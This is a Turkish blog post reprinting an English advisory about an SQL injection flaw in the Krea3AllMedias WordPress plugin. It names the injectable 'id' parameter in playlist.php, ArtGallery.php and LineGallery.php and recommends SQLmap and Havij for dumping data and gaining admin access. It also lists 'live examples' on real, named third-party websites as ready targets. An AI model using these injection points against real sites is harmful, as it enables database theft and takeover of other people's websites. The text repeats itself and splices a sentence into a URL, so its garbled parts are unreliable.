Tag Archive for Wordpress sql injection Açıkları

admin | 14 Eylül 2012
No comments

WordPress Plugins – Krea3AllMedias SQL Injection Vulnerability

WordPress Plugins – Krea3AllMedias Eklentisinde SQL injection açığı bulundu. Açık sayesinde MYSQL veritabanına bağlanılarak veriler çekilebiliniyor. Açığın bulunduğu dizinler aşağıdaki gibidir

____________________________________

Krea3AllMedias WordPress Plugin is prone to an SQL Injection Vulnerability that can be exploited using an automated program . The ‘id’ parameter cannot be injected manually because it’s impossible to detect the infected column with a Union+Select Request . Simply Because nothing is displayed in the webpage . So using an Automated tool can easily help you to inject DATA from the website and get admin access.
I recommend you using : SQLmap for Linux & Havij For Windows .

‘id’ parameter is injectable in playlist.php , LineGallery.php , ArtGallery.php .

Examples :
http://www.example.com/wp-content/plugins/Krea3Allmedias/application/services/playlist.php?id=1′ http://www.example.com/wp-content/plugins/Krea3Allmedias/application/services/premium/ArtGallery.php?id=1′ http://www.example.com/wp-content/plugins/Krea3Allmedias/application/services/premium/LineGallery.php?id=1′

Live Examples :
http://www.krea3.fr/wp-content/plugins/Krea3Allmedias/application/services/premium/LineGallery.php?id=5 http://www.restaurant-honfleur-alcyone.fr/wp-content/plugins/Krea3AllMedias WordPress Plugin is prone to an SQL Injection Vulnerability that can be exploited using an automated program . The ‘id’ parameter cannot be injected manually because it’s impossible to detect the infected column with a Union+Select Request . Simply Because nothing is displayed in the webpage . So using an Automated tool can easily help you to inject DATA from the website and get admin access.
I recommend you using : SQLmap for Linux & Havij For Windows .
‘id’ parameter is injectable in playlist.php , LineGallery.php , ArtGallery.php .
Examples :
http://www.example.com/wp-content/plugins/Krea3Allmedias/application/services/playlist.php?id=1′ http://www.example.com/wp-content/plugins/Krea3Allmedias/application/services/premium/ArtGallery.php?id=1′

Live Examples :
http://www.krea3.fr/wp-content/plugins/Krea3Allmedias/application/services/premium/LineGallery.php?id=5 http://www.restaurant-honfleur-alcyone.fr/wp-content/plugins/Krea3Allmedias/application/services/playlist.php?id=1 http://www.beuzeville-tourisme.com/wp-content/plugins/Krea3Allmedias/application/services/playlist.php?id=1
Admin Panel :
http://www.example.com/wp-admin /application/services/playlist.php?id=1 http://www.beuzeville-tourisme.com/wp-content/plugins/Krea3Allmedias/application/services/playlist.php?id=1
Admin Panel :

http://www.example.com/wp-admin

Category: Genel | Tags: , ,